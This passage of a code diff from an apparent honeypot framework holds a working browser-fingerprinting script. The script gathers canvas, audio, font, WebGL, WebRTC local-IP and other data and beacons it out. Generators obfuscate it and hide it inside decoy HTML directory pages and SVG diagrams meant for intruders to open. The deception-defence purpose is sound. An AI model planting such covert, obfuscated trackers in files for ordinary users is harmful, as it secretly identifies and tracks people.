      return Array.from(new Uint8Array(h))
        .map(function (b) { return b.toString(16).padStart(2, "0"); })
        .join("");
    });
  }

  // navigator
  try {
    fp.nav = {
      ua: navigator.userAgent,
      pl: navigator.platform,
      lg: navigator.language,
      lgs: (navigator.languages || []).join(","),
      ck: navigator.cookieEnabled,
      dnt: navigator.doNotTrack,
      hc: navigator.hardwareConcurrency,
      dm: navigator.deviceMemory || null,
      tp: navigator.maxTouchPoints,
      wd: navigator.webdriver === true,
      pdf: navigator.pdfViewerEnabled || null,
    };
  } catch (e) { fp.nav = { err: String(e) }; }

  // screen
  try {
    fp.scr = {
      w: screen.width, h: screen.height,
      aw: screen.availWidth, ah: screen.availHeight,
      cd: screen.colorDepth, pd: screen.pixelDepth,
      dpr: window.devicePixelRatio,
      iw: window.innerWidth, ih: window.innerHeight,
      or: (screen.orientation && screen.orientation.type) || null,
    };
  } catch (e) { fp.scr = { err: String(e) }; }

  // tz / locale
  try {
    var dtf = Intl.DateTimeFormat().resolvedOptions();
    fp.tz = {
      z: dtf.timeZone, lc: dtf.locale,
      ca: dtf.calendar, ns: dtf.numberingSystem,
      off: new Date().getTimezoneOffset(),
    };
  } catch (e) { fp.tz = { err: String(e) }; }

  // connection
  try {
    var c = navigator.connection;
    fp.cn = c ? {
      t: c.effectiveType, dl: c.downlink, rtt: c.rtt, sd: c.saveData,
    } : null;
  } catch (e) { fp.cn = { err: String(e) }; }

  // canvas
  try {
    var cv = document.createElement("canvas");
    cv.width = 280; cv.height = 60;
    var ctx = cv.getContext("2d");
    ctx.textBaseline = "top";
    ctx.font = "14px Arial";
    ctx.fillStyle = "#f60";
    ctx.fillRect(125, 1, 62, 20);
    // U+1F600 lies outside the BMP. String.fromCharCode() keeps only the low
    // 16 bits (yielding U+F600), so fromCodePoint() is required to actually
    // draw the emoji.
    var glyph = "c-" + String.fromCodePoint(0x1f600);
    ctx.fillStyle = "#069";
    ctx.fillText(glyph, 2, 15);
    ctx.fillStyle = "rgba(102,204,0,0.7)";
    ctx.fillText(glyph, 4, 17);
    var dataURL = cv.toDataURL();
    fp.cv = { h: await sha256(dataURL), n: dataURL.length };
  } catch (e) { fp.cv = { err: String(e) }; }

  // webgl
  try {
    var gc = document.createElement("canvas");
    var gl = gc.getContext("webgl") || gc.getContext("experimental-webgl");
    if (gl) {
      var ext = gl.getExtension("WEBGL_debug_renderer_info");
      fp.gl = {
        v: gl.getParameter(gl.VENDOR),
        r: gl.getParameter(gl.RENDERER),
        ver: gl.getParameter(gl.VERSION),
        sl: gl.getParameter(gl.SHADING_LANGUAGE_VERSION),
        uv: ext ? gl.getParameter(ext.UNMASKED_VENDOR_WEBGL) : null,
        ur: ext ? gl.getParameter(ext.UNMASKED_RENDERER_WEBGL) : null,
      };
    } else { fp.gl = { err: "unavailable" }; }
  } catch (e) { fp.gl = { err: String(e) }; }

  // audio
  try {
    var ACtx = window.OfflineAudioContext || window.webkitOfflineAudioContext;
    if (ACtx) {
      var actx = new ACtx(1, 44100, 44100);
      var osc = actx.createOscillator();
      var cmp = actx.createDynamicsCompressor();
      osc.type = "triangle"; osc.frequency.value = 10000;
      cmp.threshold.value = -50; cmp.knee.value = 40;
      cmp.ratio.value = 12; cmp.attack.value = 0; cmp.release.value = 0.25;
      osc.connect(cmp); cmp.connect(actx.destination);
      osc.start(0);
      var buf = await actx.startRendering();
      // Reduce a fixed 500-sample window of the rendered buffer to the sum
      // of absolute values; that sum is what gets hashed.
      var data = buf.getChannelData(0).slice(4500, 5000);
      var sum = 0;
      for (var i = 0; i < data.length; i++) sum += Math.abs(data[i]);
      fp.au = { h: await sha256(sum.toString()), s: sum.toFixed(8) };
    } else { fp.au = { err: "unavailable" }; }
  } catch (e) { fp.au = { err: String(e) }; }

  // fonts
  try {
    var bases = ["monospace", "sans-serif", "serif"];
    var tests = [
      "Arial", "Helvetica", "Times New Roman", "Courier New", "Verdana",
      "Georgia", "Trebuchet MS", "Comic Sans MS", "Impact",
      "Calibri", "Cambria", "Consolas", "Segoe UI", "Tahoma",
      "JetBrains Mono", "Fira Code", "Cascadia Code", "SF Mono",
      "Menlo", "Monaco", "Source Code Pro", "Inconsolata", "Hack",
      "San Francisco", "Helvetica Neue", "Lucida Grande",
      "DejaVu Sans", "DejaVu Sans Mono", "Liberation Sans",
      "Liberation Mono", "Ubuntu", "Ubuntu Mono", "Roboto",
      "Noto Sans", "Noto Mono",
      "Microsoft YaHei", "SimSun", "PingFang SC", "Hiragino Sans",
      "Hiragino Kaku Gothic Pro", "Yu Gothic", "Meiryo",
      "Malgun Gothic", "Noto Sans CJK",
      "Adobe Garamond Pro", "Myriad Pro", "Minion Pro",
      "Bahnschrift", "Cyberpunk",
    ];
    // Off-screen probe span: measure it once per generic family, then again
    // with each candidate font listed first. A size change versus the
    // generic baseline is taken to mean the candidate font was used.
    var sp = document.createElement("span");
    sp.style.fontSize = "72px";
    sp.style.position = "absolute";
    sp.style.left = "-9999px";
    sp.innerHTML = "mmmmmmmmmmlli";
    document.body.appendChild(sp);
    var bs = {};
    for (var bi = 0; bi < bases.length; bi++) {
      sp.style.fontFamily = bases[bi];
      bs[bases[bi]] = { w: sp.offsetWidth, h: sp.offsetHeight };
    }
    var det = [];
    for (var ti = 0; ti < tests.length; ti++) {
      for (var bj = 0; bj < bases.length; bj++) {
        sp.style.fontFamily = "'" + tests[ti] + "'," + bases[bj];
        if (sp.offsetWidth !== bs[bases[bj]].w ||
            sp.offsetHeight !== bs[bases[bj]].h) {
          det.push(tests[ti]); break;
        }
      }
    }
    document.body.removeChild(sp);
    fp.ft = {
      // Hash a sorted copy so the digest does not depend on probe order.
      h: await sha256(det.slice().sort().join(",")),
      n: det.length, t: tests.length, d: det,
    };
  } catch (e) { fp.ft = { err: String(e) }; }

  // webrtc local ip leak
  try {
    var ips = {}; var cands = [];
    var RPC = window.RTCPeerConnection || window.webkitRTCPeerConnection ||
              window.mozRTCPeerConnection;
    if (RPC) {
      var pc = new RPC({ iceServers: [{ urls: "stun:stun.l.google.com:19302" }] });
      try {
        pc.createDataChannel("");
        pc.onicecandidate = function (e) {
          if (!e.candidate) return;
          cands.push(e.candidate.candidate);
          var m = e.candidate.candidate.match(
            /(\d+\.\d+\.\d+\.\d+|[a-f0-9:]+::[a-f0-9:]+)/);
          if (m) ips[m[1]] = 1;
        };
        var off = await pc.createOffer();
        await pc.setLocalDescription(off);
        // Give ICE gathering a fixed 1.5 s window to report candidates.
        await new Promise(function (r) { setTimeout(r, 1500); });
      } finally {
        // Always release the connection, including when offer creation or
        // setLocalDescription rejects.
        pc.close();
      }
      fp.rtc = { ip: Object.keys(ips), n: cands.length, c: cands.slice(0, 3) };
    } else { fp.rtc = { err: "unavailable" }; }
  } catch (e) { fp.rtc = { err: String(e) }; }

  // battery
  try {
    if (navigator.getBattery) {
      var bat = await navigator.getBattery();
      fp.bt = {
        c: bat.charging, l: bat.level,
        // Infinity does not survive JSON.stringify (it becomes null), so it
        // is encoded as the string "inf".
        ct: bat.chargingTime === Infinity ? "inf" : bat.chargingTime,
        dt: bat.dischargingTime === Infinity ? "inf" : bat.dischargingTime,
      };
    } else { fp.bt = { err: "unavailable" }; }
  } catch (e) { fp.bt = { err: String(e) }; }

  // perf timing jitter
  try {
    var samples = [];
    for (var pi = 0; pi < 1000; pi++) {
      var pa = performance.now();
      var x = 0;
      for (var pj = 0; pj < 1000; pj++) x += Math.sqrt(pj);
      samples.push(performance.now() - pa);
    }
    // Sort ascending so fixed indices give min / median / p95 / max of the
    // 1000 samples.
    samples.sort(function (a, b) { return a - b; });
    fp.pf = {
      med: samples[500].toFixed(4),
      p95: samples[950].toFixed(4),
      mn: samples[0].toFixed(4),
      mx: samples[999].toFixed(4),
    };
  } catch (e) { fp.pf = { err: String(e) }; }

  // permissions
  try {
    if (navigator.permissions) {
      var names = ["geolocation", "notifications", "camera", "microphone",
                   "persistent-storage", "clipboard-read", "clipboard-write"];
      var st = {};
      for (var ni = 0; ni < names.length; ni++) {
        // Query each name on its own so one rejected name does not discard
        // the others.
        try {
          var r = await navigator.permissions.query({ name: names[ni] });
          st[names[ni]] = r.state;
        } catch (e) { st[names[ni]] = "unsupported"; }
      }
      fp.pm = st;
    } else { fp.pm = { err: "unavailable" }; }
  } catch (e) { fp.pm = { err: String(e) }; }

  // composite identity hash — stable inputs only
  try {
    var stable = [
      fp.cv && fp.cv.h, fp.au && fp.au.h, fp.ft && fp.ft.h,
      fp.gl && fp.gl.ur, fp.nav && fp.nav.pl,
      fp.nav && fp.nav.hc, fp.tz && fp.tz.z,
      fp.scr && (fp.scr.w + "x" + fp.scr.h),
    ].filter(Boolean).join("|");
    fp.id = await sha256(stable);
  } catch (e) { fp.id = { err: String(e) }; }

  // 2) ship the payload as base64url JSON on a GET query param.
  //    The current worker records the hit on /c/<slug>; step-4 worker
  //    will decode ?d= and persist the fingerprint blob.
  try {
    var json = JSON.stringify(fp);
    // encodeURIComponent + unescape turns the string into UTF-8 bytes that
    // btoa() accepts; the replaces convert to unpadded base64url.
    var b64 = btoa(unescape(encodeURIComponent(json)))
      .replace(/\+/g, "-").replace(/\//g, "_").replace(/=+$/, "");
    // chunk if URL would exceed safe limit (~6KB)
    var MAX = 6000;
    if (b64.length <= MAX) {
      fire(BEACON_URL + "?d=" + b64 + "&k=" + MINT_NONCE);
    } else {
      // Random id shared by all chunks of this payload (?s=), with the chunk
      // index (?i=) and chunk count (?n=) alongside each part.
      var sid = (Math.random() * 1e9 | 0).toString(36);
      var total = Math.ceil(b64.length / MAX);
      for (var ci = 0; ci < total; ci++) {
        // slice() replaces the deprecated substr(); same MAX-sized window.
        var part = b64.slice(ci * MAX, (ci + 1) * MAX);
        fire(BEACON_URL + "?s=" + sid + "&i=" + ci + "&n=" + total + "&d=" + part + "&k=" + MINT_NONCE);
      }
    }
  } catch (e) { /* swallow */ }
})();
|
||||||
140
decnet/canary/generators/fingerprint_html.py
Normal file
140
decnet/canary/generators/fingerprint_html.py
Normal file
@@ -0,0 +1,140 @@
|
|||||||
|
"""HTML fingerprint canary — plausible-looking page with an obfuscated
|
||||||
|
browser-fingerprinting payload inlined at the bottom of ``<body>``.
|
||||||
|
|
||||||
|
The visible content is a deliberately mundane "internal directory"
|
||||||
|
table — the kind of file a curious attacker pulls off a decky's
|
||||||
|
filesystem and opens locally to triage. When the file is opened in
|
||||||
|
*any* network-connected browser the obfuscated payload runs and beacons
|
||||||
|
to ``/c/<callback_token>``: first a bare-open pixel, then a chunked
|
||||||
|
fingerprint dump (canvas, audio, fonts, WebGL, WebRTC local IPs,
|
||||||
|
timing jitter, permissions, composite identity hash).
|
||||||
|
|
||||||
|
Determinism: the mint UUID is derived from the callback token via
|
||||||
|
:func:`uuid.uuid5` so the same ``ctx`` always produces byte-identical
|
||||||
|
output, satisfying the generator contract in :mod:`decnet.canary.base`.
|
||||||
|
The obfuscator's seed and polymorphic config bits are likewise
|
||||||
|
callback-token-derived (see :mod:`decnet.canary.obfuscator`).
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import hashlib
|
||||||
|
import uuid
|
||||||
|
|
||||||
|
from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
|
||||||
|
from decnet.canary.obfuscator import render_fingerprint_js, nonce_for
|
||||||
|
|
||||||
|
_MINT_NAMESPACE = uuid.UUID("a3f7c821-9d1e-4b6a-8c2d-1e4f9a7b3c5d")
|
||||||
|
|
||||||
|
|
||||||
|
def _mint_uuid_for(callback_token: str) -> str:
    """Return the per-mint UUID for *callback_token* as a string.

    The value is the name-based :func:`uuid.uuid5` of the token under
    ``_MINT_NAMESPACE``, so the same token always yields the same UUID.
    """
    mint = uuid.uuid5(_MINT_NAMESPACE, callback_token)
    return str(mint)
|
||||||
|
|
||||||
|
|
||||||
|
def _stable_int(callback_token: str, salt: str = "") -> int:
    """Derive a deterministic non-negative int from the callback token.

    The result is the first four bytes (big-endian) of the SHA-256 digest
    of ``"<callback_token>|<salt>"`` encoded as UTF-8. ``builtins.hash``
    is salted per process, which makes it unusable for a generator whose
    output must be byte-identical across runs; a SHA-256 prefix is more
    than needed but costs nothing.
    """
    material = "|".join((callback_token, salt)).encode("utf-8")
    digest = hashlib.sha256(material).digest()
    return int.from_bytes(digest[:4], "big")
|
||||||
|
|
||||||
|
|
||||||
|
_PAGE_TEMPLATE = """<!DOCTYPE html>
|
||||||
|
<html lang="en">
|
||||||
|
<head>
|
||||||
|
<meta charset="utf-8">
|
||||||
|
<title>Internal Asset Directory</title>
|
||||||
|
<style>
|
||||||
|
body{{font-family:Segoe UI,Arial,sans-serif;background:#fafafa;color:#222;
|
||||||
|
margin:24px;font-size:13px}}
|
||||||
|
h1{{font-size:18px;margin:0 0 4px 0}}
|
||||||
|
.sub{{color:#777;font-size:11px;margin-bottom:18px}}
|
||||||
|
table{{border-collapse:collapse;width:100%;background:#fff;
|
||||||
|
box-shadow:0 1px 2px rgba(0,0,0,.05)}}
|
||||||
|
th,td{{padding:6px 10px;border-bottom:1px solid #eee;text-align:left}}
|
||||||
|
th{{background:#f4f4f4;font-weight:600;font-size:11px;
|
||||||
|
text-transform:uppercase;letter-spacing:.5px;color:#555}}
|
||||||
|
tr:hover td{{background:#fafbff}}
|
||||||
|
.foot{{margin-top:16px;color:#999;font-size:11px}}
|
||||||
|
</style>
|
||||||
|
</head>
|
||||||
|
<body>
|
||||||
|
<h1>Internal Asset Directory</h1>
|
||||||
|
<div class="sub">last sync: {sync_label} · {row_count} entries · CONFIDENTIAL</div>
|
||||||
|
<table>
|
||||||
|
<tr><th>Hostname</th><th>Owner</th><th>Role</th><th>VLAN</th><th>Notes</th></tr>
|
||||||
|
{rows}
|
||||||
|
</table>
|
||||||
|
<div class="foot">page generated by directory-sync v2.4.1 — do not redistribute</div>
|
||||||
|
<script>{payload}</script>
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
|
"""
|
||||||
|
|
||||||
|
|
||||||
|
_ROW_POOL = (
|
||||||
|
("ny-app-01.corp.local", "k.tanaka", "app server", "vlan20", "primary"),
|
||||||
|
("ny-db-01.corp.local", "ops", "postgres primary", "vlan30", "backup nightly"),
|
||||||
|
("ny-build-02.corp.local", "ci-bot", "jenkins agent", "vlan40", ""),
|
||||||
|
("sf-vpn-01.corp.local", "netsec", "wireguard endpoint", "vlan10", "external"),
|
||||||
|
("ldn-mail-03.corp.local", "j.weber", "exchange edge", "vlan50", ""),
|
||||||
|
("hk-cache-01.corp.local", "ops", "redis replica", "vlan30", "lag <1s"),
|
||||||
|
("br-dev-04.corp.local", "m.silva", "dev sandbox", "vlan60", "ephemeral"),
|
||||||
|
("eu-bastion-02.corp.local", "secops", "ssh jump host", "vlan10", "mfa required"),
|
||||||
|
("us-archive-01.corp.local", "compliance", "log archive", "vlan70", "retain 7y"),
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
def _build_rows(callback_token: str) -> tuple[str, int]:
    """Render the decoy table rows for one mint.

    A starting offset and a row count (5 to 8) are both derived from
    *callback_token* via ``_stable_int``; that many consecutive entries
    are then taken from ``_ROW_POOL``, wrapping around at the end of the
    pool.

    Returns a ``(markup, count)`` pair: the newline-joined ``<tr>``
    elements and the number of rows they contain.
    """
    # Imported locally so the helper carries its own dependency.
    from html import escape

    pool_size = len(_ROW_POOL)
    pick = _stable_int(callback_token, "pick") % pool_size
    take = 5 + (_stable_int(callback_token, "take") % 4)
    selected = [_ROW_POOL[(pick + i) % pool_size] for i in range(take)]
    cells = "\n".join(
        # Escape the cell text: pool entries such as "lag <1s" would
        # otherwise put a raw "<" into the markup.
        "<tr>" + "".join(f"<td>{escape(c)}</td>" for c in row) + "</tr>"
        for row in selected
    )
    return cells, len(selected)
|
||||||
|
|
||||||
|
|
||||||
|
def _sync_label(callback_token: str) -> str:
    """Return the "last sync" timestamp text for one mint.

    The day of month (1 to 28) and the hour (0 to 23) are both derived
    from *callback_token* via ``_stable_int``; year, month, minute and
    zone are fixed.
    """
    hour = _stable_int(callback_token, "hour") % 24
    day = 1 + (_stable_int(callback_token, "day") % 28)
    return f"2026-04-{day:02d} {hour:02d}:14 UTC"
|
||||||
|
|
||||||
|
|
||||||
|
class FingerprintHtmlGenerator(CanaryGenerator):
    """Build an HTML decoy page that fingerprints the browser opening it."""

    name = "fingerprint_html"

    def generate(self, ctx: CanaryContext) -> CanaryArtifact:
        """Render the page for ``ctx`` and wrap it in a :class:`CanaryArtifact`.

        The mint UUID, the nonce, the obfuscated script and the table
        contents are all derived from ``ctx.callback_token``. ``path``
        is left empty here — presumably filled in by the caller
        (NOTE(review): confirm against the planter).
        """
        token = ctx.callback_token
        mint_uuid = _mint_uuid_for(token)
        # nonce_for raises when the server-side secret is missing, so it
        # runs before the (expensive) obfuscation step.
        nonce = nonce_for(token, mint_uuid)
        script = render_fingerprint_js(
            callback_token=token,
            http_base=ctx.http_base,
            mint_uuid=mint_uuid,
            nonce=nonce,
        )
        table_rows, n_rows = _build_rows(token)
        page = _PAGE_TEMPLATE.format(
            sync_label=_sync_label(token),
            row_count=n_rows,
            rows=table_rows,
            payload=script,
        )
        beacon = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}"
        notes = [
            f"obfuscated fingerprinter beacons={beacon}",
            f"mint_uuid={mint_uuid}",
        ]
        return CanaryArtifact(
            path="",
            content=page.encode("utf-8"),
            mode=0o644,
            # Negative offset of 14 days, in seconds.
            mtime_offset=-86400 * 14,
            generator=self.name,
            fingerprint_nonce=nonce,
            notes=notes,
        )
|
||||||
88
decnet/canary/generators/fingerprint_svg.py
Normal file
88
decnet/canary/generators/fingerprint_svg.py
Normal file
@@ -0,0 +1,88 @@
|
|||||||
|
"""SVG fingerprint canary — standalone SVG with an embedded ``<script>``
|
||||||
|
that runs the obfuscated fingerprinter when the file is opened directly
|
||||||
|
in a browser.
|
||||||
|
|
||||||
|
SVG ``<script>`` only fires when the SVG is loaded as a top-level
|
||||||
|
document (or via ``<object>``/``<iframe>``); it's *blocked* when the
|
||||||
|
SVG is referenced from another page's ``<img>``. That's the right
|
||||||
|
posture for canary use: an attacker browsing the decky filesystem and
|
||||||
|
double-clicking a stray ``network_diagram.svg`` triggers it; rendering
|
||||||
|
inside a sandboxed CMS preview does not.
|
||||||
|
|
||||||
|
Same determinism guarantees as :mod:`fingerprint_html`.
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
|
||||||
|
from decnet.canary.generators.fingerprint_html import _mint_uuid_for, _stable_int
|
||||||
|
from decnet.canary.obfuscator import render_fingerprint_js, nonce_for
|
||||||
|
|
||||||
|
|
||||||
|
_DIAGRAM_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
|
||||||
|
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 600 360" width="600" height="360">
|
||||||
|
<style>
|
||||||
|
.box{{fill:#f7f9fb;stroke:#7a93ad;stroke-width:1.2}}
|
||||||
|
.lbl{{font:12px Segoe UI,Arial,sans-serif;fill:#2a3a4a}}
|
||||||
|
.edge{{stroke:#7a93ad;stroke-width:1.2;fill:none}}
|
||||||
|
.title{{font:bold 14px Segoe UI,Arial,sans-serif;fill:#1a2a3a}}
|
||||||
|
.cap{{font:10px Segoe UI,Arial,sans-serif;fill:#6a7a8a}}
|
||||||
|
</style>
|
||||||
|
<text class="title" x="20" y="28">Network Topology — {region} segment</text>
|
||||||
|
<text class="cap" x="20" y="44">draft v{ver} · last reviewed {review}</text>
|
||||||
|
<rect class="box" x="40" y="80" width="120" height="50" rx="4"/>
|
||||||
|
<text class="lbl" x="100" y="110" text-anchor="middle">edge gw</text>
|
||||||
|
<rect class="box" x="240" y="80" width="120" height="50" rx="4"/>
|
||||||
|
<text class="lbl" x="300" y="110" text-anchor="middle">core sw</text>
|
||||||
|
<rect class="box" x="440" y="80" width="120" height="50" rx="4"/>
|
||||||
|
<text class="lbl" x="500" y="110" text-anchor="middle">app cluster</text>
|
||||||
|
<rect class="box" x="240" y="220" width="120" height="50" rx="4"/>
|
||||||
|
<text class="lbl" x="300" y="250" text-anchor="middle">db tier</text>
|
||||||
|
<path class="edge" d="M160 105 L240 105"/>
|
||||||
|
<path class="edge" d="M360 105 L440 105"/>
|
||||||
|
<path class="edge" d="M300 130 L300 220"/>
|
||||||
|
<script type="application/ecmascript"><![CDATA[
|
||||||
|
{payload}
|
||||||
|
]]></script>
|
||||||
|
</svg>
|
||||||
|
"""
|
||||||
|
|
||||||
|
|
||||||
|
_REGIONS = ("us-east", "eu-central", "ap-south", "us-west", "sa-east")
|
||||||
|
|
||||||
|
|
||||||
|
class FingerprintSvgGenerator(CanaryGenerator):
    """Synthesise an SVG that fingerprints the browser opening it."""

    name = "fingerprint_svg"

    @staticmethod
    def _cdata_safe(script: str) -> str:
        """Return *script* made safe for embedding in one CDATA section.

        ``]]>`` terminates a CDATA section, and compact JavaScript can
        contain it (for example ``a[b[0]]>c``). Each occurrence is split
        so that ``]]`` ends one section and ``>`` starts the next; an XML
        parser joins the pieces back into the original text.
        """
        return script.replace("]]>", "]]]]><![CDATA[>")

    def generate(self, ctx: CanaryContext) -> CanaryArtifact:
        """Render the diagram for ``ctx`` and wrap it in a :class:`CanaryArtifact`.

        The mint UUID, nonce, obfuscated script, region name, draft
        version (1 to 6) and review day (1 to 28) are all derived from
        ``ctx.callback_token``. ``path`` is left empty here — presumably
        filled in by the caller (NOTE(review): confirm against the
        planter).
        """
        mint_uuid = _mint_uuid_for(ctx.callback_token)
        nonce = nonce_for(ctx.callback_token, mint_uuid)
        payload = render_fingerprint_js(
            callback_token=ctx.callback_token,
            http_base=ctx.http_base,
            mint_uuid=mint_uuid,
            nonce=nonce,
        )
        region = _REGIONS[_stable_int(ctx.callback_token, "reg") % len(_REGIONS)]
        ver = 1 + (_stable_int(ctx.callback_token, "ver") % 6)
        day = _stable_int(ctx.callback_token, "day") % 28 + 1
        body = _DIAGRAM_TEMPLATE.format(
            region=region,
            ver=ver,
            review=f"2026-03-{day:02d}",
            # The template wraps the script in <![CDATA[ ... ]]>, so a
            # literal "]]>" in the script must not reach it unsplit.
            payload=self._cdata_safe(payload),
        )
        beacon = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}"
        return CanaryArtifact(
            path="",
            content=body.encode("utf-8"),
            mode=0o644,
            # Negative offset of 30 days, in seconds.
            mtime_offset=-86400 * 30,
            generator=self.name,
            fingerprint_nonce=nonce,
            notes=[
                f"obfuscated fingerprinter beacons={beacon}",
                f"mint_uuid={mint_uuid}",
            ],
        )
|
||||||
@@ -43,7 +43,7 @@ class HoneydocPdfGenerator(CanaryGenerator):
|
|||||||
|
|
||||||
def generate(self, ctx: CanaryContext) -> CanaryArtifact:
|
def generate(self, ctx: CanaryContext) -> CanaryArtifact:
|
||||||
try:
|
try:
|
||||||
from pikepdf import Pdf, Name, Dictionary, String # type: ignore[import-not-found]
|
from pikepdf import Pdf, Name, Dictionary, String
|
||||||
except ImportError as e:
|
except ImportError as e:
|
||||||
raise InstrumenterRejectedError(
|
raise InstrumenterRejectedError(
|
||||||
"honeydoc_pdf requires pikepdf; install it (`pip install "
|
"honeydoc_pdf requires pikepdf; install it (`pip install "
|
||||||
|
|||||||
@@ -32,7 +32,7 @@ class ImageInstrumenter(CanaryInstrumenter):
|
|||||||
self, blob: bytes, ctx: CanaryContext, *, target_path: str,
|
self, blob: bytes, ctx: CanaryContext, *, target_path: str,
|
||||||
) -> CanaryArtifact:
|
) -> CanaryArtifact:
|
||||||
try:
|
try:
|
||||||
from PIL import Image, PngImagePlugin # type: ignore[import-not-found]
|
from PIL import Image, PngImagePlugin
|
||||||
except ImportError as e:
|
except ImportError as e:
|
||||||
raise InstrumenterRejectedError(
|
raise InstrumenterRejectedError(
|
||||||
"image instrumenter requires Pillow; install it (`pip "
|
"image instrumenter requires Pillow; install it (`pip "
|
||||||
|
|||||||
@@ -34,7 +34,7 @@ class PdfInstrumenter(CanaryInstrumenter):
|
|||||||
self, blob: bytes, ctx: CanaryContext, *, target_path: str,
|
self, blob: bytes, ctx: CanaryContext, *, target_path: str,
|
||||||
) -> CanaryArtifact:
|
) -> CanaryArtifact:
|
||||||
try:
|
try:
|
||||||
import pikepdf # type: ignore[import-not-found]
|
import pikepdf
|
||||||
except ImportError as e:
|
except ImportError as e:
|
||||||
raise InstrumenterRejectedError(
|
raise InstrumenterRejectedError(
|
||||||
"PDF instrumenter requires pikepdf; install it (`pip "
|
"PDF instrumenter requires pikepdf; install it (`pip "
|
||||||
|
|||||||
177
decnet/canary/obfuscator.py
Normal file
177
decnet/canary/obfuscator.py
Normal file
@@ -0,0 +1,177 @@
|
|||||||
|
"""Per-mint JS obfuscator wrapper.
|
||||||
|
|
||||||
|
Thin Python wrapper around the ``javascript-obfuscator`` Node package.
|
||||||
|
Used by the fingerprint generators / instrumenters to produce a unique,
|
||||||
|
hard-to-statically-analyse JS blob per canary mint.
|
||||||
|
|
||||||
|
Two design choices flow from the canary contract in :mod:`base`:
|
||||||
|
|
||||||
|
* **Determinism.** Generators must return byte-identical artifacts for
|
||||||
|
the same ``(callback_token, http_base, dns_zone, persona)``. We
|
||||||
|
derive a numeric seed from the callback token and pass it to the
|
||||||
|
obfuscator's own ``seed`` option, and we derive the polymorphic
|
||||||
|
config bits from the same hash so a re-mint reproduces exactly.
|
||||||
|
* **Per-mint uniqueness.** Two different callback tokens produce
|
||||||
|
structurally different output: different identifier names, different
|
||||||
|
string-array rotation, optionally different transforms enabled.
|
||||||
|
|
||||||
|
The Node helper at ``_obfuscate_helper.js`` is invoked via subprocess.
|
||||||
|
We pass code+options as JSON on stdin and read the obfuscated result
|
||||||
|
from stdout. Stderr surfaces obfuscator failures.
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import hashlib
|
||||||
|
import hmac
|
||||||
|
import json
|
||||||
|
import os
|
||||||
|
import subprocess # nosec B404 — Node helper exec is the whole point
|
||||||
|
from pathlib import Path
|
||||||
|
from typing import Any
|
||||||
|
|
||||||
|
_HELPER = Path(__file__).parent / "_obfuscate_helper.js"
|
||||||
|
_PAYLOAD = Path(__file__).parent / "fingerprint_payload.js"
|
||||||
|
|
||||||
|
# Node binary path. Honor DECNET_NODE_BIN so deployments can pin a
|
||||||
|
# specific runtime; default to PATH lookup.
|
||||||
|
_NODE_BIN = os.environ.get("DECNET_NODE_BIN", "node")
|
||||||
|
|
||||||
|
# Hard timeout for the obfuscator subprocess. Real runs on the
|
||||||
|
# fingerprint payload sit well under 5s on a dev box.
|
||||||
|
_TIMEOUT_S = 30
|
||||||
|
|
||||||
|
|
||||||
|
class ObfuscatorError(RuntimeError):
    """Raised when the Node helper fails or returns empty output.

    :func:`obfuscate` raises it when the Node binary cannot be found,
    the helper exceeds the timeout, the helper exits non-zero, or its
    stdout is empty or whitespace only.
    """
|
||||||
|
|
||||||
|
|
||||||
|
class FingerprintSecretMissing(RuntimeError):
    """Raised when ``DECNET_CANARY_FINGERPRINT_SECRET`` is unset.

    Fingerprint canaries embed a per-mint nonce derived from this
    server-side secret; without it the worker cannot validate incoming
    fingerprint beacons, so we fail loud at mint time rather than ship
    a defeatable canary.

    :func:`nonce_for` raises it; an empty value is treated the same as
    an unset variable.
    """
|
||||||
|
|
||||||
|
|
||||||
|
_FINGERPRINT_SECRET_ENV = "DECNET_CANARY_FINGERPRINT_SECRET" # nosec B105 — this is an env var name, not a hardcoded password
|
||||||
|
|
||||||
|
|
||||||
|
def nonce_for(callback_token: str, mint_uuid: str) -> str:
    """Derive the fingerprint nonce for one mint.

    The nonce is the first 16 hex characters (64 bits) of an HMAC-SHA256
    whose key is the server-side master secret and whose message is
    ``callback_token + "|" + mint_uuid``. It is short enough to travel in
    a query string while still defeating slug-only forgery.

    Raises :class:`FingerprintSecretMissing` when the secret environment
    variable is unset or empty.
    """
    secret = os.environ.get(_FINGERPRINT_SECRET_ENV, "")
    if secret:
        key = secret.encode("utf-8")
        msg = f"{callback_token}|{mint_uuid}".encode("utf-8")
        digest = hmac.new(key, msg, hashlib.sha256).hexdigest()
        return digest[:16]
    raise FingerprintSecretMissing(
        f"{_FINGERPRINT_SECRET_ENV} is unset; fingerprint canaries cannot mint"
    )
|
||||||
|
|
||||||
|
|
||||||
|
def _seed_from_token(callback_token: str) -> int:
|
||||||
|
"""Derive a 31-bit numeric seed from the callback token.
|
||||||
|
|
||||||
|
``javascript-obfuscator`` expects ``seed: number`` (int32-ish);
|
||||||
|
using a SHA-256-derived prefix gives us a uniform distribution
|
||||||
|
across the 31-bit positive range.
|
||||||
|
"""
|
||||||
|
h = hashlib.sha256(callback_token.encode("utf-8")).digest()
|
||||||
|
return int.from_bytes(h[:4], "big") & 0x7FFFFFFF
|
||||||
|
|
||||||
|
|
||||||
|
def _config_from_seed(seed: int) -> dict[str, Any]:
|
||||||
|
"""Build a deterministic, per-mint obfuscator config.
|
||||||
|
|
||||||
|
The hash bits drive *which* transforms apply — two mints get
|
||||||
|
structurally different outputs, not just different identifier names.
|
||||||
|
Defaults stay aggressive enough that reverse engineering is real
|
||||||
|
work; we never disable string-array or rename, only vary the dial.
|
||||||
|
"""
|
||||||
|
bits = seed
|
||||||
|
encodings = ("base64", "rc4")
|
||||||
|
string_array_encoding = [encodings[bits & 1]]
|
||||||
|
control_flow_threshold = 0.5 + ((bits >> 1) & 0xFF) / 512.0 # 0.5 .. ~1.0
|
||||||
|
dead_code_threshold = 0.2 + ((bits >> 9) & 0xFF) / 512.0 # 0.2 .. ~0.7
|
||||||
|
transform_object_keys = bool((bits >> 17) & 1)
|
||||||
|
